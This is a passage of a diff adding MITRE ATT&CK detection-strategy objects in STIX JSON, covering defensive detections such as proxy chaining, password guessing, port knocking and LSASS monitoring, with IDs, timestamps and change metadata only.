+                            "url": "https://attack.mitre.org/detectionstrategies/DET0359",
+                            "external_id": "DET0359"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Multi-hop Proxy Behavior via Relay Node Chaining, Onion Routing, and Network Tunneling",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--128315ea-6407-4c28-8528-209e799ad8e1",
+                        "x-mitre-analytic--2416a634-3ad9-4f91-a894-8fb0d9d83b76",
+                        "x-mitre-analytic--b97a1c6e-bb02-4e14-ae57-6a9e96512657",
+                        "x-mitre-analytic--08370ff8-9442-42c0-bfb5-c7f5792c74ea",
+                        "x-mitre-analytic--a691ee45-94bf-4244-a286-b80c21859d2e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7a182af0-a7e1-41a1-ae5e-ac76ff7f5948",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0023",
+                            "external_id": "DET0023"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Obfuscated Binary Unpacking Detection via Behavioral Patterns",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e6a7eeb3-0652-460c-b68b-f17d2ed82822",
+                        "x-mitre-analytic--3cb4d3f4-df71-474c-a9f0-438dbf26bf66",
+                        "x-mitre-analytic--003c2ca3-a9a8-4a56-9163-f6733f19b41d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b3ce3826-401f-4549-92ce-c825b4ddafb0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0551",
+                            "external_id": "DET0551"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Password Guessing via Multi-Source Authentication Failure Correlation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--52dfd8de-910a-4caa-98a7-6dcf44ef903e",
+                        "x-mitre-analytic--14390641-6cba-4351-a488-bf97c6eee8a7",
+                        "x-mitre-analytic--53336c8f-a218-462a-b97c-aac07cf96077",
+                        "x-mitre-analytic--f525a464-a4e5-40fb-831a-162af2f232e7",
+                        "x-mitre-analytic--13556e3f-80f0-4aac-83f0-0d6c706e76ff",
+                        "x-mitre-analytic--1d8bc80f-8719-41f0-a73e-127d6830f516"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--72742281-7457-4124-a277-7f3cf5e23f4e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0161",
+                            "external_id": "DET0161"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Password Policy Discovery \u2013 cross-platform behavior-chain analytics",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ae82099a-0baf-4887-953c-67ef5e2d4470",
+                        "x-mitre-analytic--bcf6e9cb-fee9-4efd-8998-03de4908448b",
+                        "x-mitre-analytic--4f71c7bd-dd25-43c7-ac5c-7a85c7588759",
+                        "x-mitre-analytic--12f9a28b-126d-48b1-bc93-5bc3c1635905",
+                        "x-mitre-analytic--0b0d50a0-d07b-4cf1-9cb0-23c95e8321b2",
+                        "x-mitre-analytic--d71a1e3e-6507-438b-9ee2-f80dc1f938d2",
+                        "x-mitre-analytic--d93312e3-210a-4757-b638-4ed19fca8621"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f273ee4a-e468-4a01-bb1a-f3a687518ded",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0491",
+                            "external_id": "DET0491"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Peripheral Device Enumeration via System Utilities and API Calls",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a986c8fd-6779-4769-895a-e6d167d9f1a9",
+                        "x-mitre-analytic--c8d9ad93-e4ce-4b00-89cb-8f0f6452923d",
+                        "x-mitre-analytic--479e5749-a746-4b17-9543-ca4b9d41576a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--68b7c978-74e4-4f87-a953-2a4e752f56c2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0302",
+                            "external_id": "DET0302"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Port-knock \u2192 rule/daemon change \u2192 first successful connect (T1205.001)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--22ff1717-6ba8-4908-b795-edf0c41a997e",
+                        "x-mitre-analytic--7bf8954f-5028-419d-b93f-9c6bfe6e5086",
+                        "x-mitre-analytic--39da0718-fa22-4f77-8bd2-ea8300087658",
+                        "x-mitre-analytic--fe82e2a6-a928-4fe0-a899-fead90eabb29"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ee07e9eb-8438-4c7c-8260-88a09fbe98de",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0105",
+                            "external_id": "DET0105"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Post-Credential Dump Password Cracking Detection via Suspicious File Access and Hash Analysis Tools",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d2a45051-b999-4969-aeb0-d7f83d453976",
+                        "x-mitre-analytic--7efdc4e3-8a2e-4d0d-8ced-03155f2c55ac",
+                        "x-mitre-analytic--3682e3c9-33a7-4328-b0c5-73c8bbcb9b53",
+                        "x-mitre-analytic--0084089f-6e5f-42c4-8b0d-78e95cd55d0f",
+                        "x-mitre-analytic--029db14d-fb94-49ee-9d6d-3c7212671377"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3d515fbc-0ebf-4a99-b191-b6ee604acb1f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0358",
+                            "external_id": "DET0358"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Programmatic and Excessive Access to Confluence Documentation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--62f43db8-4701-49b9-bb0e-a8fde37e5d07"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--33ab9d0c-5671-48e6-8465-f80560909c65",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0370",
+                            "external_id": "DET0370"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Recursive Enumeration of Files and Directories Across Privilege Contexts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--69d9d158-aa43-4b73-b9a4-f1a2dc6c13c1",
+                        "x-mitre-analytic--b50bf863-644a-48c2-85a3-2c633f135650",
+                        "x-mitre-analytic--42683860-d6df-4585-af65-31f783269f8f",
+                        "x-mitre-analytic--aaddc766-52bb-428b-98c4-3a742d10befa",
+                        "x-mitre-analytic--be6e5f23-0e29-430f-83f7-d76c58de3a2d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6b47bf45-a3f2-4d4b-884a-3cec3ef3f994",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0542",
+                            "external_id": "DET0542"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Registry and LSASS Monitoring for Security Support Provider Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b4a380ed-cc16-47cd-8fe1-44ccf4cad097"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--834e853c-479d-4ddd-a1a3-349b09466b8d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0259",
+                            "external_id": "DET0259"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Remote Desktop Software Execution and Beaconing Detection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fe1e10ae-ddd2-40f0-8e62-3db88c0c8c68",
+                        "x-mitre-analytic--77769a6d-f3f4-42f1-a9a7-0d1096563115",
+                        "x-mitre-analytic--1d46bf4d-a090-4865-9205-e271d223da42"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8225c396-cbf9-499a-b94d-bdc7a1f07458",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0301",
+                            "external_id": "DET0301"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Removable Media Execution Chain Detection via File and Process Activity",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--12c748a0-3ce9-4fd2-8a65-f4362b69cafd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c2648552-806d-40ec-8ea7-59f4e44983eb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0005",
+                            "external_id": "DET0005"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Renamed Legitimate Utility Execution with Metadata Mismatch and Suspicious Path",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ec036273-4e90-465e-b115-a69bbb68dde4",
+                        "x-mitre-analytic--3349af7c-3cea-4424-b2a4-056fedb63831",
+                        "x-mitre-analytic--bd8beea8-48c8-41dc-8991-f8c739d10c70"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--440ddaf2-4e80-4699-90d7-0bdccdfeece6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0267",
+                            "external_id": "DET0267"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Resource Hijacking Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a789e535-cab9-49b4-9685-c10a5d3642b4",
+                        "x-mitre-analytic--7d099bc4-1a19-4aa3-b12b-a9390e98408a",
+                        "x-mitre-analytic--8cbeecbb-429f-4f30-9f42-266aaa7b2c0f",
+                        "x-mitre-analytic--8e1872c2-906c-4cf8-b0c7-afd448fe1c0b",
+                        "x-mitre-analytic--791ea4ff-7a49-4aa7-a41c-51288031e0f0",
+                        "x-mitre-analytic--6e5bfc6b-3f07-426b-ac9f-6a8cc6b591c3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c3c32822-80b2-4399-8e82-15cefaa80333",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0527",
+                            "external_id": "DET0527"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Right-to-Left Override Masquerading Detection via Filename and Execution Context",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fb330f70-f0f4-4a5b-9b91-37d29a097a4c",
+                        "x-mitre-analytic--667326a7-1f31-4ef1-92c1-6cb5241dadcf",
+                        "x-mitre-analytic--7a72f91d-9c16-4724-b87d-3e5448f81b51"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e2409f82-e24c-4bb9-ad44-b20d97fb7a5a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0016",
+                            "external_id": "DET0016"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Security Software Discovery Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d0d1375d-f5c2-4271-b5e7-415c478d5e86",
+                        "x-mitre-analytic--3928ff9c-961e-455c-a2b1-d79ca788591f",
+                        "x-mitre-analytic--9d76d84b-6393-45cf-b872-eb5921508ee3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bc8cd246-1521-4643-a07e-428d45093b38",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
